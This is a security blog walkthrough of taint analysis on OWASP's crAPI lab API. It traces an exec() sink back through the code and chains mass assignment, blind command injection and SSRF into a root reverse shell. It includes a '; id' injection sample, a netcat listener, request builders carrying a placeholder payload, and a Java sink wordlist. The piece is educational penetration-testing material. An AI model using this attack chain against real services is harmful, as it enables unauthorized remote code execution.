Tracing API exploitability through code review and taint analysis

It’s not uncommon to find yourself with access to the source code of an API. Whether you’re looking at an open-source project or a proprietary one you’ve decompiled, there may be times when you need to evaluate the security of the API by looking at the code.

In this article, we’ll look at how to leverage the concepts of sources and sinks to conduct taint analysis to find exploitable vulnerabilities in your APIs quickly. In fact, I will do this on our favorite API, OWASP’s completely ridiculous API (crAPI), to give you a real-world example.

We aren’t going to look for the simple OWASP API Security Top 10 stuff. Instead, we’ll build an attack chain that leads to a reverse shell and a foothold on the identity server of crAPI.

Let’s go have some fun!

Getting the source code of your API

The first step in any form of taint analysis is to gain access to the source code.

In our case, OWASP publishes the source code to crAPI on GitHub. So we can just check it out with git.

But what if we didn’t have access to the source directly? How else could we get the code?

Gaining access to the API binaries

When you don’t have access to the API source itself, maybe you can get access to the compiled or deployed code. This might be actual binaries, managed .NET DLLs, or Java JAR / WAR files. It could even be raw PHP, Python, or JavaScript (think Node.js) files.

In any case, there are a few ways you can collect the API artifacts:

Deploy the application to virtual machines (VMs) through a cloud marketplace like Amazon or Azure. When app vendors make their apps and APIs accessible through an app catalog, you can deploy them into your own cloud environment and then get terminal access to the VM(s) to access the files directly.
If you can’t find the API in an app catalog, you could request a trial version of the software. Sometimes it’s easy to just fill in a form and get access to an installable version. I’m not a big fan of this method, as it puts you in a sales funnel when you have no intention to buy. It’s a waste of time for both you and the sales team.
You can hire a freelancer to install the app for you and send you the binaries. You’d be surprised how many people are on sites like Fiverr or Upwork and willing to do the heavy lifting. Look for freelancers with experience in the software; they probably have access to the files already.
Check if you can get deployable versions of the API in a container registry like Docker Hub. It’s not uncommon, especially for commercial open-source projects, to find containers you can pull down directly, if not from the original maintainers then from someone who has built their own custom configuration. Once you have the containers downloaded locally, you can deploy an instance, attach to it, and get direct access to the files.

Once you have the API artifacts, you can then use a decompiler to get a readable form of the source code.

An introduction to “sources” and “sinks”

I think the reverse engineering gurus on the Internet like to overcomplicate things. Let’s break with tradition and give a simple and practical explanation of what sources and sinks are.

A source is simply any data input you as an attacker can manipulate. This could be data from a file, the network, or directly from the user.

A sink is anything that processes that data. This is usually a dangerous function that doesn’t handle the data very well, allowing us to make the code do things it isn’t supposed to.

You’ve seen this before. Basic buffer overflows in the C programming language have used sources and sinks for decades. A source might be some user input into the application, which is then processed by a dangerous function like strcpy(), our sink in the equation. If the input is larger than the buffer strcpy() is copying bytes to, you get an overflow, allowing us to manipulate memory and possibly change the code execution path to run our exploit.

In the world of APIs, looking for dangerous sinks is very much language-dependent. Luckily for us, a lot of research has already been done in this field. In fact, there is an awesome database of dangerous sink signatures maintained by Eldar Marcussen (aka wireghoul) in the graudit project.

TIP: If you decide to use the graudit signatures, always start by looking for the fruit.db for the language. This contains the most common (aka low-hanging fruit) signatures of dangerous sinks for that language.

In data flow analysis, the source is the start of the data flow, and the sink is the end. Our goal is to connect the sources and sinks together by following how the tainted data flows through the API.

Personally, I like to work backwards. I detect a dangerous sink first and then trace back through the code to find where data I can manipulate (aka taint) enters the API.

Let me show you how.

Taint Analysis of crAPI

For the rest of this article, I am going to walk you through the actual approach I used to find a command injection vulnerability in crAPI. It gives us remote code execution (RCE) and, ultimately, a reverse shell on the API’s identity server.

This methodology is what I always do as a first pass when I get access to source code. There are definitely more thorough and complex ways to accomplish this; I balance effort and time investment against the potential gains.

YMMV. This is just my approach.

Finding the dangerous sink

So the first step is to decide where in crAPI to do the analysis. While auditing all the code is possible, it’s not practical, especially in larger code bases.

We want to be strategic and focus on the areas that give us the biggest “bang for our buck”… so to speak.

As we’ve already done a pretty thorough app walkthrough for crAPI in other articles, I know a majority of the API I want to tackle exists in the Java source code that can be found at /crAPI/services/identity/src.

So the first thing to do is search for all possible dangerous sinks based on the Java language. Years ago, I would just use a bash script that would loop through a wordlist of dangerous sinks and grep through the source code. However, these days we can use graudit to do all the heavy lifting for us.
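For the curious, that old wordlist-and-grep loop is easy to picture. Here is a minimal sketch of the same idea in Python rather than bash. The three patterns are a hypothetical, deliberately tiny stand-in for a real signature database, and find_sinks() is a name I made up for illustration.

```python
import re
from pathlib import Path

# Hypothetical mini wordlist of Java sinks; real signature databases are far larger.
SINK_PATTERNS = [r"\.exec\s*\(", r"ProcessBuilder", r"Runtime\.getRuntime"]


def find_sinks(root, suffix=".java"):
    """Yield (path, line_number, line) for every source line matching a sink pattern."""
    compiled = [re.compile(pattern) for pattern in SINK_PATTERNS]
    for path in sorted(Path(root).rglob(f"*{suffix}")):
        with path.open(encoding="utf-8", errors="replace") as handle:
            for number, line in enumerate(handle, start=1):
                if any(rx.search(line) for rx in compiled):
                    yield str(path), number, line.strip()
```

Looping over find_sinks(".") and printing each hit as path +line gives you something you can paste straight after vi. It works, but you end up maintaining the wordlist yourself, which is exactly the chore a signature database takes off your hands.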

Here is the command to use to have graudit scan the Java codebase looking for dangerous sinks:

$ graudit -d java -L .

Let’s break down the args of the call:

-d java : Tells graudit to load the database of dangerous sinks for java
-L : Tells graudit to display vim-friendly line numbers (more about this in a moment)
. : Tells graudit to search through all files from the current location. You could use a relative or absolute path to a different directory if you like.

Once executed, graudit will scan all the Java source code and output anything that matches the dangerous sink database. As we look through the results, we can quickly see a perfect candidate: a call to exec() in BashCommand.java.

Experience is helpful here. I know that calls to exec() can lead to remote code execution, which is why it sticks out so quickly for me. With over 400 other findings in just this part of the codebase, you can see why it’s essential to try to isolate the areas of the API code you want to review.

Anyways, let’s explore that exec call in more detail. By using the -L argument, the output includes vim-friendly line numbers, which means I can open up the source code right to the suspicious line I want to audit:

$ vi ./main/java/com/crapi/utils/BashCommand.java +46

If we look at the code, we can see the dangerous sink is found in a function called executeBashCommand(). We can also see that the code constructs the call to exec() by taking whatever parameter is passed into the function and constructing the equivalent of bash -c <command>.

This is an ideal candidate for a traditional command injection vulnerability.
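To make it obvious why, here is a minimal sketch of that pattern in Python. It is not the crAPI code: build_conversion_command(), the convert-tool name, and input.mp4 are all hypothetical, and I’m assuming the caller simply appends the parameters to a command string. Nothing is executed; we only look at what would be handed to the shell.

```python
def build_exec_argv(command):
    """Mimic the sink: whatever string arrives becomes the script bash runs."""
    return ["bash", "-c", command]


def build_conversion_command(conversion_params):
    # Hypothetical caller: glues attacker-reachable params onto a fixed command.
    return "convert-tool input.mp4 " + conversion_params


normal = build_exec_argv(build_conversion_command("-v codec h264"))
tainted = build_exec_argv(build_conversion_command("-v codec h264; id"))

print(normal[2])   # one command, as the developer intended
print(tainted[2])  # the ';' makes bash run a second command of our choosing
```

Because the whole string is interpreted by bash, shell metacharacters like ; and && in the parameter are treated as syntax, not data.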

Time to trace backward and find a way to call this function!

Tracing the data flow to executeBashCommand()

So where in the code is executeBashCommand() called? Time for a bit of grep:

$ grep -R -n executeBashCommand

It appears from the results that this function is called in ProfileServiceImpl.java. Let’s check it out.

TIP: grep -n prints each hit as file:line:text, which vi can’t open directly the way it can with graudit’s -L output. Replace the first colon with a space followed by a + sign, and vi will open the file at the offending line. No biggy, and it’s a big timesaver compared to scrolling through hundreds of lines of code.

$ vi ./main/java/com/crapi/service/Impl/ProfileServiceImpl.java +242
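If you do this a lot, the colon-to-plus conversion from the tip is easy to script. This is a small sketch; grep_hit_to_vi() is a hypothetical helper name, and it assumes the file path itself contains no colon.

```python
def grep_hit_to_vi(hit):
    """Turn one 'path:line:matched text' line from grep -n into 'vi path +line'."""
    # Split on the first two colons only, so colons in the matched code are left alone.
    path, line_number, _matched_text = hit.split(":", 2)
    return f"vi {path} +{int(line_number)}"
```

Feed it one line of grep output and paste the result into your terminal.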

We can see that the call sits deep inside a conditional block in a function called convertVideo(). We can also see that the data comes from profileVideo.getConversion_params().

This is important. If we look closely at the code, we can see that profileVideo is an entity of ProfileVideo (/crAPI/services/identity/src/main/java/com/crapi/entity/ProfileVideo.java). We can also see that getConversion_params() returns an internal variable called conversion_params. If we look at the entity code closer, we can see we can set that variable if we can call setConversion_params().

So now we have two different things to trace. We first need to figure out how to call setConversion_params(), so we can taint the input. We then need to figure out how to call convertVideo() to trigger the dangerous sink.

We’re making progress! Still with me? OK, let’s figure out how to taint the conversion_params.

Tracing the data flow to setConversion_params()

Time for a bit more grep-fu:

$ grep -R -n 'setConversion_params'

We can ignore all the tests returned. That leaves us with two candidates to check – both in ProfileServiceImpl.java.

When we check the first one, we see it enters a function called uploadProfileVideo().

After closer observation, we can see that we can’t modify the input there to taint the data. It hardcodes the value to “-v codec h264”. So we can stop looking here.

Let’s check the other candidate.

$ vi ./main/java/com/crapi/service/Impl/ProfileServiceImpl.java +150

Bingo. If we can find a way to call updateProfileVideo(), we can taint the data that executeBashCommand() will use in the dangerous sink to exec() by simply setting the value.

Tracing the data flow to updateProfileVideo()

Let’s grep some more:

$ grep -R -n 'updateProfileVideo'

Ignoring the test files, we see only one candidate in ProfileController.java on line 100:

$ vi ./main/java/com/crapi/controller/ProfileController.java +100

Got it! There is a public endpoint at /api/v2/user/videos/{video_id}. That’s our entry point for our source. If we can set the conversion_params in the body of the PUT, we can set the variable that convertVideo() will use.
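As a rough sketch, this is what building that request could look like with Python’s standard library. The base URL, the bearer-token header, and the build_update_request() helper are my assumptions for illustration; only the path and the conversion_params property come from the code we just traced. The request is built but not sent.

```python
import json
import urllib.request


def build_update_request(base_url, video_id, token, conversion_params):
    """Build (but don't send) the PUT that sets conversion_params on a video."""
    body = json.dumps({"conversion_params": conversion_params}).encode("utf-8")
    return urllib.request.Request(
        url=f"{base_url}/api/v2/user/videos/{video_id}",
        data=body,
        method="PUT",
        headers={
            "Content-Type": "application/json",
            # Assumption: the API authenticates with a bearer token.
            "Authorization": f"Bearer {token}",
        },
    )
```

Passing the result to urllib.request.urlopen() would actually send it. Your deployment may need a path prefix in base_url or extra fields in the body.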

Only one thing left to figure out. How do we call convertVideo() once we taint the conversion_params?

Tracing the data flow to convertVideo()

One last grep:

$ grep -R -n 'convertVideo'

We see one candidate in ProfileController.java on line 148. Let’s check it out.

$ vi ./main/java/com/crapi/controller/ProfileController.java +148

Haha! It looks like it’s a GET endpoint at /api/v2/user/videos/convert_video. The endpoint has a query parameter called video_id.

I think that’s everything we will need to construct our attack.
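If it helps to see the whole trace in one place, here is a small sketch that records what each grep pass told us as a callee-to-callers map and walks it backwards from the sink. The CALLERS table is my own summary of the findings above, and trace_to_entry_points() is a hypothetical helper, not something from crAPI or graudit.

```python
from collections import deque

# callee -> callers, as recovered by the grep passes above.
CALLERS = {
    "exec": ["executeBashCommand"],
    "executeBashCommand": ["convertVideo"],
    "convertVideo": ["GET /api/v2/user/videos/convert_video"],
    "setConversion_params": ["uploadProfileVideo", "updateProfileVideo"],
    # uploadProfileVideo is not traced further: it hardcodes the value.
    "updateProfileVideo": ["PUT /api/v2/user/videos/{video_id}"],
}


def trace_to_entry_points(start):
    """Walk callers breadth-first; return every path ending where no caller is recorded."""
    finished = []
    queue = deque([[start]])
    while queue:
        path = queue.popleft()
        callers = CALLERS.get(path[-1], [])
        if not callers:
            finished.append(path)
            continue
        for caller in callers:
            if caller not in path:  # guard against cycles
                queue.append(path + [caller])
    return finished


for chain in trace_to_entry_points("exec") + trace_to_entry_points("setConversion_params"):
    print(" <- ".join(chain))
```

Two chains end at an HTTP endpoint: the GET that triggers the sink and the PUT that taints its input. Those are the two halves of the attack.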

It’s taken me a few minutes to document this for the article, but when I did the initial taint analysis it took me less than 15 minutes to follow the sink back to the source. With practice, you’ll be able to do that too… if not faster.

Planning out our attack chain

OK, here is what we know:

We have to upload a profile video. During the app walkthrough, we saw we could do that in the my-profile section of the app.
We then need to update the profile video and set the conversion_params with the command we want to run on the server. We must remember that this is a blind command injection (we won’t see any results from the command returned as it’s executed later), so we will need it to call back to us somehow. We could possibly use Burp Collaborator for this, but since I am running this locally using Docker and controlling all the infrastructure, I’ll construct a reverse shell payload and catch it with netcat.
Once we have set the payload, we need to call convertVideo() to execute it.

It seems simple enough. Let’s load up Burp and give it a try.

Executing our attack

With Burp loaded, we can log into the crAPI app and click on our icon on the top right. We’re ready to go.

Step 1 – Upload profile video

To upload the video, we click the vertical ellipsis (three-dot) menu and choose to upload a video. When the upload completes, we get a response with info about the video.

We can see we have successfully uploaded our profile video. Notice the response… we can see the id of the video, which we will need later, as well as the first look at the conversion_params with the hardcoded value we detected during analysis.

Step 2 – Update profile video

To update the video, let’s start by changing the video name: click the vertical ellipsis (three-dot) menu and select “Change Video Name.” This sends a PUT request to the /api/v2/user/videos/{video_id} endpoint.

Here is the first vulnerability we can take advantage of. When I sent the request through the browser, it only sent a body with the videoName property set. However, during code analysis, we saw that the function actually takes a VideoForm data model… which can ALSO include the conversion_params property.

This is a PERFECT example of a mass assignment vulnerability. We can taint the object by simply adding in the conversion_params property. In my case, I will inject a simple reverse shell using bash. How to create reverse shell payloads is beyond this article; if you want to learn more, I suggest you check out one of the great rooms on TryHackMe.
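If mass assignment is new to you, here is a minimal sketch of the pattern in Python. It is a generic illustration, not the crAPI implementation: the ProfileVideo dataclass and update_profile_video() function below are hypothetical stand-ins that bind every recognized property in the request body onto the stored object.

```python
from dataclasses import dataclass, fields


@dataclass
class ProfileVideo:
    videoName: str = ""
    conversion_params: str = "-v codec h264"  # the hardcoded upload default


def update_profile_video(video, body):
    """Vulnerable pattern: copy every known field from the request body."""
    known = {f.name for f in fields(video)}
    for key, value in body.items():
        if key in known:  # no allow-list of client-editable fields
            setattr(video, key, value)
    return video


# What the UI sends: only the name changes.
ui_update = update_profile_video(ProfileVideo(), {"videoName": "holiday"})

# What an attacker sends: an extra property the UI never exposes.
attacker_update = update_profile_video(
    ProfileVideo(), {"videoName": "holiday", "conversion_params": "<payload>"}
)
```

The fix on the server side is an explicit list of properties the client is allowed to change. From our side of the fence, the lesson is to always try the properties you saw in the data model but not in the UI.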

Anyways… here goes…

Perfect. We can see the update worked, and our payload is in the conversion_params field.

Time to trigger it!

Step 3 – Trigger reverse shell by calling convertVideo()

So there is no UI in the crAPI web app that calls this endpoint. But we can just as easily craft one in Burp. So I send a GET request from another call to the Repeater tab and modify it to send to /api/v2/user/videos/convert_video?video_id=27.

On my local machine, I set up a netcat listener and wait for the crAPI server to call back to me:

$ nc -nlp 4242

Time to trigger the reverse shell…

WTF? It didn’t work. We get a 403 response with a message that the endpoint should be accessed only internally. It also says that the endpoint is actually at http://crapi-identity:8080/identity/api/v2/user/videos/convert_video.

Damn it. It was too good to be true. It looks like we need to find a way to call this internally. From an attacker’s perspective, this is called a server-side request forgery (SSRF) attack.

FUNNY SIDE NOTE: Always read error responses closely. I didn’t notice it until I was writing this article and looking at the screenshots, but the devs hinted that you should use SSRF in the way they spelled out the error message. I missed that originally. I knew what to do because it told us the endpoint could only be called internally.

Anyways, let’s go hunting for the SSRF.

Step 4 – Trigger reverse shell by calling convertVideo() using SSRF

OK, so admittedly, this took me a bit to find. Looking for SSRF isn’t trivial. You have to look for code that runs on the server that makes a request that we can manipulate by changing the URL to point to the internal convertVideo endpoint.

In my case, I had already documented an interesting finding in the workshop API for merchants. At the /workshop/api/merchant/contact_mechanic endpoint, you can set the mechanic_api property during a POST. That should work perfectly. We can set it to http://crapi-identity:8080/identity/api/v2/user/videos/convert_video?video_id=27, which will then trigger the call from the workshop API to the identity API.
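Here is a small sketch of building that request body in Python. Only the mechanic_api property and the internal URL come from what we’ve seen so far; build_ssrf_body() is a hypothetical helper, and a real request will likely need whatever other fields the endpoint expects, which I’m not showing here.

```python
import json
from urllib.parse import urlencode

# Internal address leaked by the 403 error message.
INTERNAL_CONVERT_URL = "http://crapi-identity:8080/identity/api/v2/user/videos/convert_video"


def build_ssrf_body(video_id):
    """Return a JSON body whose mechanic_api points at the internal trigger endpoint."""
    target = f"{INTERNAL_CONVERT_URL}?{urlencode({'video_id': video_id})}"
    # Assumption: any other required fields get merged into this body by the caller.
    return json.dumps({"mechanic_api": target})


print(build_ssrf_body(27))
```

The workshop service makes the GET for us from inside the network, so the “internal only” check on the identity service never sees our external request.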

Let’s give it a try:

After a while, the server returns a 504 Gateway Timeout error. However, check your netcat listener…

Bingo! Even though the API call timed out, our malicious payload was executed. We have our reverse shell… as root on the identity server!

Conclusion

What a trip! Getting remote code execution and catching reverse shells from an API server is a pretty critical finding. Always a lot of fun when we can manipulate an API like this.

From here, it would be pretty easy to write a single bash PoC script that completely pwns any crAPI server and gets you a shell. Well, on the identity server container at least.

You can check out my article on exploiting APIs with cURL for a good starting point PoC script that you can modify to do just that.

Have fun with it. Practice. Pwn all the things.